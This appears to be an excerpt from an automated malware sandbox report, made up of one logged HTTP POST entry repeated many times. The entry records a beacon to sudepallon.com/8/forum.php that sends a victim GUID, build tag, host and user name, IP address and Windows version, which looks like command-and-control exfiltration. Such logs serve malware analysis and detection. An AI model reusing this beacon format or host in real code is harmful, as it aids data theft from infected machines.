Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
